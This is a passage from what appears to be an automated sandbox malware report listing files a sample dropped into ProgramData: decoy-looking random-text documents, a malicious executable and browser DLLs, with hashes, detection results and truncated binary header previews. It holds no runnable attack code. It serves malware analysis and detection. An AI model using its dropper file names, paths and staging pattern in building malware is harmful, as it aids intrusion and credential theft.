                                                                                                                                                                                                                                                                                                                                                                Preview:NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\NVWZAPQSQL.docx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                                                                                                                                                MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                                                                                                                                                SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                                                                                                                                                SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                                                                                                                                                SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\NVWZAPQSQL.xlsx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6998645060098685
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                                                                                                                                                                                                                                                                                                                                MD5:1676F91570425F6566A5746BC8E8427E
                                                                                                                                                                                                                                                                                                                                                                SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                                                                                                                                                                                                                                                                                                                                SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                                                                                                                                                                                                                                                                                                                                SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):3047424
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.876980552165079
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:ubxuBXjA7pOxwz1HCBCvWV3BE1G89lHdXCkdC7EVUgKcAWg5t:exeYka7WVBEk89lHdXCkdQEdA
                                                                                                                                                                                                                                                                                                                                                                MD5:29DEB5EE2C07F1E8660E10AB6E4A0966
                                                                                                                                                                                                                                                                                                                                                                SHA1:CE8D68341F3A150E0AE4F26BCE649E505F766A5D
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EC88B7D9AAB10E45DC4AC1AAFFA5D9DA9BF2E368580BDDF16F0DDE301E97B43F
                                                                                                                                                                                                                                                                                                                                                                SHA-512:4D3E6117EA337CA5902CC4E19C99C82A177AB889412E58BFF59B88B348D5589EA3AA10E48878C14DF80276C79FF43D6A15D893E1C53C9888FDD7BDD746D3435B
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                                • Filename: zbnq9rGNLi.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: e5eFd2bt37.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y..>=.um=.um=.umR.~m<.um..{m).umR..mw.um=.tm6.um_.fm(.um..~m<.um..sm<.umRich=.um................PE..L....f.e.............................A............@..................................................................................0 ..i..............................................................................<............................text...:...........................`....rdata..\".......0..................@..@.data...XT.......@..................@....rsrc....p...0 ..p.... .............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\SFPUSAFIOL.xlsx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.696913287597031
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
                                                                                                                                                                                                                                                                                                                                                                MD5:44ECF9E98785299129B35CBDBCAB909B
                                                                                                                                                                                                                                                                                                                                                                SHA1:4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
                                                                                                                                                                                                                                                                                                                                                                SHA-256:06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
                                                                                                                                                                                                                                                                                                                                                                SHA-512:1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\SQRKHNBNYN.docx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.699088014379539
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:iGmuvXb+mVV5Ule86OuFXvk64KaOMJQaJO7tZAWPN4rOnsK:/muvL+mP5Ule86OuraOMJZOHADqf
                                                                                                                                                                                                                                                                                                                                                                MD5:BF469DD8C21F5160EACD49BB59E9A370
                                                                                                                                                                                                                                                                                                                                                                SHA1:2CE4942C6CD2E22A644BAAFAED41DF9D0773477F
                                                                                                                                                                                                                                                                                                                                                                SHA-256:9ECF07708D59E0B3AE33ED553978F4B2BB806B2FB805296F73F9270C4AE01B84
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBBB805B4C65902C67F2F432BA20FFF689FABDB3652702FA176369107F688C43923C9D729095F313425847E14B138E61117ED6C03E582F82B6426BBC2C481380
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:SQRKHNBNYNETDCILWIKLNRYHJZUPCYVTJJKABYYNVEJZBFJGIUZEFUHCOZZISQELZULMAPFIBUSVGGSXSVZRNJXFVUEIKBQNARELKJEJZTEBGXIFTBGDXBSYFJKFICMLOMHZZSIJMPIXZMQULHAZWNOCSCLWTNJMCGVQAOPYTZVRLCKSUPSMWVOFCPJAONGQBPLMQUTZSFYRIBDZWBXIEDJISMCTGTYKEIXWVDVOGMFUNRJDNEGJLVWNACBBGIIRTAHGUMSLSIZNGTRAUGMZTVGLIAKLLKJGKBMXIFPOYCQXJZKJHTLNZGDCLMXTYOBGFAPOQCJGRAKORKGGWPBOJLOZATKDZYFDSONUZOGBFRDBUKZTVYZGXDEWUOXNWHMOIBVOWNWFGBHSDTQQKXWZEHQLAYIXOVZEEZNESKKWITYPIDCMFHTWVHMHFCGNEBNVBSSQHMRSWLHVMAZERIUFTRXEVZHKRXWOMGETJJFBRLFIBRGLAQKLDFZEGHLZSVAMXMNCCUROXGQOMDQJSKUNOGLGYYTVABESIDHASDRACLOFEWGPYLEORXSYDRDGPGOXHIAISBZBDRNVQJXXIBNBXMDSKXPBSCGKGPASGNOIDKIBFJWUIRQHZLXZQVHUEHMHTRDWKGJVQHWFQEBJIBQLDWQHOQLXSPFPLWPYZROYDAQOOOYKTPVFQXLMLRDYSVXVAWCEGVSHGDVSHONQUAVCBBHJRTIJAYXUILHNGHIXFJPJFAUDIJFORYJZHNAXLWYBLWKCVJLUJIGBYGSEWFJFIROQQXBVEJEPGVYKSDGTPKJAXDLAEHUXWDHSNXZPAKHXDOWTIFIVFZHYQJCDKOBOMCFVMEKARJULRZEOXVQKSLPWYLMLCYLKXCIELPAZNPRENTCWPNMFETAJHSENFDLPGHKVHIIHECDTQGWZMNTMEHNJFXFUGFJMWUXXGOIHOBSONRLSITUXOCRFNCIJNPHZABGDPAFATRMRCPXROMUN

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\UOOJJOZIRH.docx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                                                                                                                                MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                                                                                                                                SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\UOOJJOZIRH.xlsx

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                                                                                                                                MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                                                                                                                                SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                                                                                                                                SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                                                Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                                • Filename: rNUBzMB8Cm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: uvEXXJGeMd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 0Rajeau4sd.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: epQiTcNFEp.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 5Yzloz244r.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: e5eFd2bt37.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: OPnywcBrh6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 3vEtFxRJ9c.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: 1fXeff6C8A.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                • Filename: hqsQzin1r6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\nsx5151.tmp
                                                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                                                Antivirus:
